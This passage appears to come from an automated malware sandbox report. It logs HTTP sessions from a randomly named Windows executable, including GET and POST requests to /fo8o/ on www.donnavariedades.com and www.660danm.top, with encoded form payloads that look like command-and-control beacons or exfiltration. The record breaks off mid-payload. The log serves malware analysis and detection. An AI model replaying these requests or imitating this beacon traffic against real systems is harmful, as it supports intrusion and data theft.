Xvzj4gFyojs7HLDiigZob8Wd6sIIIisTkhHfsAPpuiTMNB2uwXrClxPl0FhS+fUcchQnlU+JRtAWK4N30ocnQy8pOE7V0=
Apr 26, 2024 10:09:06.122335911 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 08:09:06 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Sorting-Hat-PodId: -1 Vary: Accept-Encoding x-frame-options: DENY x-request-id: 9a842b04-7650-448b-9163-2b6f6d30cec7-1714118946 server-timing: processing;dur=4 content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=9a842b04-7650-448b-9163-2b6f6d30cec7-1714118946 x-content-type-options: nosniff x-download-options: noopen x-permitted-cross-domain-policies: none x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=9a842b04-7650-448b-9163-2b6f6d30cec7-1714118946 x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1 Content-Encoding: gzip CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yJXvL8upT5JCSe5s8exfmyghNWtA7%2FiUuhobNIaMv04GJhTPS1xqt8yPzB4xom0uHDQmSBI1Tmospgq22s78398G8gPRbonhH6EH99axbz9KWjzymtkfwtL1uNi%2BydT7RKRbgE8B%2Bmbr"}],"group":"cf-nel","max_age Data Raw: Data Ascii:
Apr 26, 2024 10:09:06.122379065 CEST	210	IN	Data Raw: 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 Data Ascii: :604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=49.000025Server: cloudflareCF-RAY: 87a516b488b46db0-MIAalt-svc: h3=":443"; ma=86400
Apr 26, 2024 10:09:06.122476101 CEST	1289	IN	Data Raw: 62 36 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 cd 5a 7f 73 db b6 19 fe 3f 9f 02 a6 da c6 ea 89 22 29 8a 22 25 4b ea 25 b6 73 cd 9a db 76 4b bb de ad ed ed 40 12 94 68 53 04 47 52 96 d4 2c df 7d 0f 00 92 a2 64 2b 55 b2 74 dd 39 39 93 20 f0 e2 fd fd Data Ascii: b6aZs?")"%K%svK@hSGR,}d+Ut99 xEr1,WB#-q@LK~WOi$bTX/!"GNqKd!%!Sb-XIIytOL:gd6F~d~eIB&q.ZS
Apr 26, 2024 10:09:06.122499943 CEST	1289	IN	Data Raw: c6 e1 d7 f8 52 e5 06 02 96 c5 bf be 0d 4a 47 99 e1 13 c9 b4 b2 c2 27 52 80 dd ca 9c a6 e8 ef 84 bb 8b 68 15 0c 16 84 d1 82 e9 71 aa f3 75 49 cc a2 91 fc ac b9 42 b6 b3 26 36 c9 56 06 86 f0 9b 75 31 b1 91 0b 2a f5 1c 0f 57 11 d4 9a 58 55 a5 a6 1a Data Ascii: RJG'RhquIB&6Vu1*WXU0r?6uFhX&!x4ZnFH/nI'"tL~TtCRBR:7$)<iUZN=T2<Wqd!J9N&!!Q<Fi>Ng.<
Apr 26, 2024 10:09:06.122519016 CEST	351	IN	Data Raw: fb 78 59 7f 23 17 33 f2 3c 58 b2 e0 1e 30 4a bb 71 78 4e be fa 6a 4f 5c cc 02 04 7e 30 a1 db f4 59 35 61 c5 11 ae d8 66 c4 f8 b9 7f 59 5d f5 74 7f 16 19 fb 0b e3 6a 9f 36 ea 05 6d 4e fa 2b 5a 06 cb cb 9c 75 9f 22 ac 48 af 76 15 4d 55 a9 b1 0f 4b Data Ascii: xY#3<X0JqxNjO\~0Y5afY]tj6mN+Zu"HvMUK3Y&@#Nq]u@21!]kG7R<>-RWNpVINvySBo/qyy~"Sv7O-xOXR0"LyQ%rp2_,X=$)n!Cj
Apr 26, 2024 10:09:06.122538090 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.9	49742	23.227.38.74	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:09:09.304909945 CEST	512	OUT	GET /fo8o/?OVFPBtpp=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pThujZncl+tVTqRpQa58ob5uovzcVfw==&-LXd8=qhq0rNepS HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.donnavariedades.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Apr 26, 2024 10:09:09.495692968 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 08:09:09 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Sorting-Hat-PodId: -1 X-Storefront-Renderer-Rendered: 1 Vary: Accept-Encoding vary: Accept x-frame-options: DENY content-security-policy: frame-ancestors 'none'; x-shopid: x-shardid: -1 powered-by: Shopify server-timing: processing;dur=6;desc="gc:1", asn;desc="174", edge;desc="MIA", country;desc="US", pageType;desc="404", servedBy;desc="kvn6", requestID;desc="d9ddf08f-c24f-46c0-9267-ccec356d2009-1714118949" x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1 x-request-id: d9ddf08f-c24f-46c0-9267-ccec356d2009-1714118949 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0o65ni8lbvPNAsqB6LSetk6XT7862%2FFWykLyldTj%2BvyGqj7PmmgdOcoYaGPhwuAaWtgH6oxMFg%2FEsw3iiFhR%2BDH5tEyBI4BDrTQFuB48gjgEG1KRGrYRlh%2FgVY8gJdFMbOsEodGqstnX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Server-Timing: cfRequestDuration;dur=65.000057 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Download-Options: noopen Server: cloudflare CF-RAY: 87a516c9887a8daf-MIA alt-svc: h Data Raw: Data Ascii:
Apr 26, 2024 10:09:09.495714903 CEST	1289	IN	Data Raw: 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a 32 30 62 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 Data Ascii: =":443"; ma=8640020b2<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en"> <![
Apr 26, 2024 10:09:09.495815992 CEST	1289	IN	Data Raw: 32 30 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 23 70 67 2d 73 74 6f 72 65 34 30 34 20 7b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 38 30 70 78 20 30 20 35 30 Data Ascii: 20px; border-radius: 25px; } #pg-store404 { padding: 80px 0 50px 0; text-align: center; } #pg-store404 h1 { font-size: 40px; font-family: 'Shopify Sans Medium'; } html, body { height
Apr 26, 2024 10:09:09.496192932 CEST	1289	IN	Data Raw: 6c 65 73 2f 31 2f 30 34 35 38 2f 34 38 33 36 2f 33 30 33 30 2f 66 69 6c 65 73 2f 53 68 6f 70 69 66 79 53 61 6e 73 2d 4d 65 64 69 75 6d 2e 77 6f 66 66 32 3f 76 3d 31 36 37 34 36 31 30 39 31 36 27 29 0a 20 20 20 20 20 20 20 20 66 6f 72 6d 61 74 28 Data Ascii: les/1/0458/4836/3030/files/ShopifySans-Medium.woff2?v=1674610916') format('woff2'); } .new-stores-link { background: black; border-radius: 20px; color: white; font-family: 'Shopify Sans Medium'; p
Apr 26, 2024 10:09:09.496206999 CEST	1289	IN	Data Raw: 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 35 42 35 42 35 42 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 Data Ascii: font-size: 14px; text-decoration: none; color: #5B5B5B; } .arrow-line, .arrow-head { transition: transform 0.3s ease-in-out; will-change: transform; } .back-button:hover .arrow-line { tran
Apr 26, 2024 10:09:09.496381998 CEST	1289	IN	Data Raw: 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 2d 34 35 64 65 67 2c 20 23 43 31 45 39 46 46 2c 20 23 46 34 46 35 46 36 2c 20 23 45 31 46 43 46 46 2c 20 23 42 44 45 37 46 46 29 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 63 6f 6c 6f Data Ascii: und: linear-gradient(-45deg, #C1E9FF, #F4F5F6, #E1FCFF, #BDE7FF); } .color2 { background: linear-gradient(-45deg, #ECEAFB, #ECF7FC, #F0EDFE, #E9E8FB); } .background-animation { background-size: 400% 400%; an
Apr 26, 2024 10:09:09.496392012 CEST	1289	IN	Data Raw: 20 73 74 72 6f 6b 65 3d 22 23 35 42 35 42 35 42 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 76 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 Data Ascii: stroke="#5B5B5B" stroke-width="2"/> </svg> <span class="back-button-text"> SHOPIFY </span> </a> <div id="shop-not-found" class="error-message"> <h1 class="tc"
Apr 26, 2024 10:09:09.496412039 CEST	665	IN	Data Raw: 2d 6d 65 61 6e 2d 6d 73 67 22 29 2e 73 68 6f 77 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 3c 2f Data Ascii: -mean-msg").show(); } } }); </script> </div> </div> </div> <div class="supporting-content"> <div id="owner"> <div class="owner-header">
Apr 26, 2024 10:09:09.496439934 CEST	1289	IN	Data Raw: 32 38 66 61 0d 0a 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 63 63 6f 75 6e 74 73 2e 73 68 6f 70 69 66 79 2e 63 6f 6d 2f 72 65 63 6f 76 65 72 79 2f 73 74 6f 72 65 73 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 67 75 72 75 63 6f 70 79 26 75 74 6d 5f Data Ascii: 28fa href="https://accounts.shopify.com/recovery/stores?utm_source=gurucopy&utm_medium=link&utm_campaign=Gurus">forgot your store</a> page. </div> </div> </div> <div class="push"></div> </div> ... End con
Apr 26, 2024 10:09:09.496444941 CEST	1289	IN	Data Raw: 34 2e 31 31 34 20 31 33 2e 31 31 39 36 4c 31 31 33 2e 30 38 33 20 31 38 2e 35 39 31 38 48 31 31 35 2e 38 31 39 4c 31 31 36 2e 38 38 39 20 31 32 2e 39 34 31 34 43 31 31 37 2e 30 30 38 20 31 32 2e 33 35 33 34 20 31 31 37 2e 30 37 34 20 31 31 2e 37 Data Ascii: 4.114 13.1196L113.083 18.5918H115.819L116.889 12.9414C117.008 12.3534 117.074 11.7562 117.088 11.1566C117.088 9.61505 116.275 8.6834 114.848 8.6834Z" fill="black"/> <path d="M123.273 8.68336C119.983 8.68336 117.802 11.6577 117.802 14.968
Apr 26, 2024 10:09:09.496467113 CEST	1289	IN	Data Raw: 2e 39 30 36 20 34 2e 39 35 39 31 38 20 31 33 39 2e 37 33 33 20 35 2e 30 37 36 32 32 20 31 33 39 2e 35 38 37 20 35 2e 32 32 33 36 33 43 31 33 39 2e 34 34 32 20 35 2e 33 37 31 30 33 20 31 33 39 2e 33 32 37 20 35 2e 35 34 35 38 34 20 31 33 39 2e 32 Data Ascii: .906 4.95918 139.733 5.07622 139.587 5.22363C139.442 5.37103 139.327 5.54584 139.25 5.73792C139.173 5.92999 139.135 6.13548 139.138 6.34244C139.138 7.15525 139.654 7.71132 140.427 7.71132H140.466C141.32 7.71132 142.053 7.13619 142.073 6.12495C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.9	49743	34.111.148.214	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:09:16.011919022 CEST	762	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.660danm.top Origin: http://www.660danm.top Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 197 Referer: http://www.660danm.top/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6b 38 49 71 59 6a 43 7a 72 6b 6e 71 78 6c 42 78 35 70 5a 6a 48 37 48 51 6f 33 33 56 6e 4e 4a 72 64 76 4c 2b 69 6b 6b 4f 71 77 75 78 48 64 32 43 33 33 31 45 37 55 6c 43 70 79 65 5a 55 37 2f 37 62 31 55 47 42 61 6e 55 50 36 50 66 52 70 71 53 54 70 39 69 47 4a 68 2f 4a 45 41 4f 6f 74 78 50 51 53 71 30 43 62 44 6e 33 4c 32 45 2b 63 6f 35 56 39 67 76 6f 71 6b 79 49 6e 54 43 69 35 73 55 55 30 64 55 73 32 39 38 48 55 79 30 33 4e 46 66 35 44 6f 4e 55 6c 32 35 4a 50 2b 7a 57 79 63 69 6a 57 49 4d 31 7a 46 78 6a 53 61 38 51 48 51 4c Data Ascii: OVFPBtpp=gB7R/rxgLjsQk8IqYjCzrknqxlBx5pZjH7HQo33VnNJrdvL+ikkOqwuxHd2C331E7UlCpyeZU7/7b1UGBanUP6PfRpqSTp9iGJh/JEAOotxPQSq0CbDn3L2E+co5V9gvoqkyInTCi5sUU0dUs298HUy03NFf5DoNUl25JP+zWycijWIM1zFxjSa8QHQL
Apr 26, 2024 10:09:16.347203970 CEST	728	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.20.2 Date: Fri, 26 Apr 2024 08:09:16 GMT Content-Type: text/html Content-Length: 559 Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.9	49744	34.111.148.214	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:09:18.700666904 CEST	786	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.660danm.top Origin: http://www.660danm.top Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.660danm.top/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6e 63 59 71 61 45 57 7a 71 45 6e 72 37 46 42 78 77 4a 5a 6e 48 37 4c 51 6f 7a 50 46 6e 2f 74 72 64 50 62 2b 6a 6e 38 4f 70 77 75 78 49 39 32 62 6f 48 31 4e 37 55 70 4b 70 79 79 5a 55 37 62 37 62 77 77 47 42 70 2f 54 4a 36 50 64 64 4a 71 51 63 4a 39 69 47 4a 68 2f 4a 45 45 30 6f 74 35 50 51 69 36 30 44 34 62 67 72 62 32 44 33 38 6f 35 66 64 67 72 6f 71 6b 55 49 6d 2f 34 69 36 45 55 55 32 46 55 73 45 46 37 4e 55 79 2b 36 74 45 31 39 54 5a 35 4d 6c 4b 42 57 4d 57 43 49 41 63 39 6b 33 6f 53 6b 42 4d 71 32 46 61 62 58 67 5a 6a 4c 58 43 53 6c 6c 63 6e 30 43 69 32 36 69 4f 46 51 43 74 2b 66 77 3d 3d Data Ascii: OVFPBtpp=gB7R/rxgLjsQncYqaEWzqEnr7FBxwJZnH7LQozPFn/trdPb+jn8OpwuxI92boH1N7UpKpyyZU7b7bwwGBp/TJ6PddJqQcJ9iGJh/JEE0ot5PQi60D4bgrb2D38o5fdgroqkUIm/4i6EUU2FUsEF7NUy+6tE19TZ5MlKBWMWCIAc9k3oSkBMq2FabXgZjLXCSllcn0Ci26iOFQCt+fw==
Apr 26, 2024 10:09:19.036030054 CEST	728	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.20.2 Date: Fri, 26 Apr 2024 08:09:18 GMT Content-Type: text/html Content-Length: 559 Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.9	49745	34.111.148.214	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:09:21.388138056 CEST	1799	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.660danm.top Origin: http://www.660danm.top Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1233 Referer: http://www.660danm.top/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6e 63 59 71 61 45 57 7a 71 45 6e 72 37 46 42 78 77 4a 5a 6e 48 37 4c 51 6f 7a 50 46 6e 2f 6c 72 64 38 44 2b 6a 47 38 4f 6f 77 75 78 46 64 32 47 6f 48 30 4e 37 56 42 4f 70 79 4f 6a 55 35 54 37 61 57 38 47 48 63 54 54 63 4b 50 64 56 70 71 64 54 70 39 33 47 4e 46 37 4a 45 30 30 6f 74 35 50 51 6b 57 30 45 72 44 67 70 62 32 45 2b 63 6f 31 56 39 67 54 6f 71 39 68 49 6d 36 61 69 4b 6b 55 55 57 56 55 2f 48 39 37 42 55 79 77 39 74 45 74 39 54 56 6d 4d 6c 57 6a 57 4e 7a 58 49 43 4d 39 68 52 46 51 68 41 4d 57 6b 30 57 32 42 48 6f 4b 4d 53 6d 46 67 57 78 59 69 6a 71 57 37 7a 37 37 5a 6d 70 78 4e 53 6a 49 75 37 4f 47 56 63 44 63 57 73 6a 55 47 63 58 65 7a 52 68 39 4e 42 4c 31 4c 31 58 78 39 49 4b 55 6c 62 34 44 77 33 36 37 49 69 6a 4a 4b 69 58 76 7a 73 7a 68 5a 4e 74 54 53 6e 6f 71 39 7a 49 56 52 78 46 2b 6d 48 30 71 4f 61 63 78 37 4b 71 50 36 58 4d 41 72 49 30 30 52 6b 2b 58 57 34 33 57 7a 4b 46 53 47 4a 63 67 33 34 55 67 36 58 43 74 74 76 4f 70 59 48 44 73 32 4c 67 71 50 53 78 41 34 75 64 6d 78 41 6e 7a 62 54 59 4a 5a 66 63 49 41 73 46 48 35 52 52 48 31 47 39 31 75 75 41 37 78 56 73 73 4b 65 50 66 50 74 35 44 2f 70 38 6f 72 31 6f 6a 46 30 32 2f 63 67 44 34 73 46 70 62 53 4b 4a 41 65 6f 56 51 71 6d 43 70 50 63 6d 54 46 47 72 59 6b 38 62 4d 58 69 36 4e 4f 4e 47 6f 30 70 46 4a 65 49 62 37 4c 66 76 71 79 7a 7a 65 7a 52 37 38 69 55 47 62 4b 72 69 4c 4e 2f 6c 68 74 77 32 4f 71 7a 6c 37 62 45 6e 39 49 73 75 78 6f 2b 62 4a 4e 68 50 58 33 6e 34 55 64 6c 4e 75 2f 34 46 4d 30 48 39 47 76 59 51 67 43 6b 65 4a 6d 57 34 69 52 58 6a 4a 49 44 69 58 39 71 6d 37 64 2b 75 48 6e 57 74 4d 75 78 61 58 58 58 57 4a 66 51 43 55 4f 77 54 2b 6a 5a 70 2f 75 72 7a 64 4a 35 2f 58 2b 50 77 51 50 2f 49 37 79 76 6a 50 69 72 4d 33 51 75 2f 4a 77 47 73 45 4f 54 6d 6c 6b 34 6b 44 52 76 72 36 4c 37 6d 41 2b 4f 63 6a 56 37 75 36 7a 4c 51 5a 4f 2b 37 52 56 2f 45 7a 4a 6c 69 64 6f 59 78 33 78 6d 74 6c 69 68 51 5a 31 50 2b 44 42 52 38 49 61 4e 56 6f 42 4e 2b 58 55 49 31 35 5a 36 76 44 4a 72 38 57 36 78 45 69 39 46 62 63 6f 48 31 4c 4d 36 34 6d 39 79 66 64 37 43 2b 35 59 65 4d 6e 66 6f 44 47 4b 47 59 33 41 46 79 58 62 73 64 67 31 39 75 31 52 76 58 79 41 52 58 31 31 76 6a 32 77 34 58 46 71 31 42 42 66 79 61 51 66 35 48 69 6a 73 69 68 47 31 41 53 58 50 54 66 52 6e 32 62 35 4f 4b 67 39 41 53 48 78 61 72 47 31 4b 36 30 6d 31 71 63 59 66 77 4d 2f 6e 42 44 39 54 71 4a 79 55 48 7a 36 51 44 39 75 4d 42 4c 59 41 46 6c 54 6a 35 70 51 7a 6c 30 55 62 36 46 44 47 56 69 63 34 4f 62 78 31 68 70 37 2f 63 78 65 6c 74 47 52 39 37 54 46 31 39 